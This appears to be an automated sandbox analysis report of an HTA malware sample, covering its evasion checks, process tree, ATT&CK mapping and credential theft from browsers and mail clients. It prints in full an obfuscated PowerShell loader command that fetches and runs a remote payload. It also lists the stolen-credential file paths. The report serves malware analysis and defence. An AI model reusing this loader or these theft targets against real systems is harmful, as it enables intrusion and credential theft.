                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: powershell.exe, 00000005.00000002.1853721064.0000000005D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2936900255.0000000002A15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
Source: MSBuild.exe, 00000008.00000002.2936900255.0000000002AC5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLLT-KQ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Memory allocated: 1010000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Memory allocated: 29E0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Memory allocated: 1030000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3353
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6454
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7752 | Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: MSBuild.exe, 00000008.00000002.2936900255.0000000002A15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware
Source: MSBuild.exe, 00000008.00000002.2936900255.0000000002A15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
Source: MSBuild.exe, 00000008.00000002.2940231574.0000000005C59000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllemen
Source: wscript.exe, 00000003.00000003.1739322666.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739105346.0000000002AF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1742695685.0000000002B06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738450202.0000000002AD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1742218678.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1740585638.0000000002AF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738691504.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWXn
Source: MSBuild.exe, 00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
Source: wscript.exe, 00000003.00000003.1739011670.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743609926.0000000002B54000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: MSBuild.exe, 00000008.00000002.2936900255.0000000002A54000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vMCIE6kpe8bW6hPfP
Source: wscript.exe, 00000003.00000003.1739322666.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739105346.0000000002AF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1742695685.0000000002B06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738450202.0000000002AD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1742218678.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1740585638.0000000002AF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738691504.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBn
Source: MSBuild.exe, 00000008.00000002.2936900255.0000000002A54000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vMCIE6kpe8bW6hPfP.exe
Source: powershell.exe, 00000005.00000002.1867975144.0000000008071000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

                        Anti Debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_010170B8 CheckRemoteDebuggerPresent, 8_2_010170B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\wscript.exe | Network Connect: 23.186.113.60 443
Source: Yara match | File source: amsi32_7624.amsi.csv, type: OTHER
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\octupole.vbs"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreak
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bg
Bn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Stealing of Sensitive Information

Source: Yara match | File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.powershell.exe.5e0e358.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.powershell.exe.5e0e358.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1853721064.0000000005D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7784, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 00000008.00000002.2936900255.0000000002A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                        Remote Access Functionality

Source: Yara match | File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.powershell.exe.5e0e358.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.powershell.exe.5e0e358.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1853721064.0000000005D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7784, type: MEMORYSTR
                        MITRE ATT&CK Matrix (numbers in front of a technique are the report's signature counts for that cell)

                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | 212 Scripting | Valid Accounts | 231 Windows Management Instrumentation | 212 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                        Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 35 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | Security Account Manager | 531 Security Software Discovery | SMB/Windows Admin Shares | 11 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
                        Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 261 Virtualization/Sandbox Evasion | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 261 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 111 Process Injection | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        Behavior Graph

                        Behavior Graph ID: 1629094
                        Sample: morninghtaaaafilex.hta
                        Start date: 04/03/2025
                        Architecture: WINDOWS
                        Score: 100

                        Sample-level DNS/IP info: paste.ee; tse1.mm.bing.net; 8 other IPs or domains
                        Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures
                        Signature on paste.ee: Connects to a pastebin service (likely for C&C)

                        Process tree (numbers after a process name are the counts of created files / registry values from the legend above):

                        mshta.exe (2), started
                          dropped: C:\Windows\Temp\misdivide.bat, DOS
                          cmd.exe (2), started
                            dropped: C:\Windows\Temp\octupole.vbs, ASCII
                            signature: Command shell drops VBS files
                            wscript.exe (14), started
                              DNS/IP: paste.ee 23.186.113.60, 443, 49733 KLAYER-GLOBALNL Reserved
                              signatures: System process connects to network (likely due to code injection or exploit); Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
                              powershell.exe (15 15), started
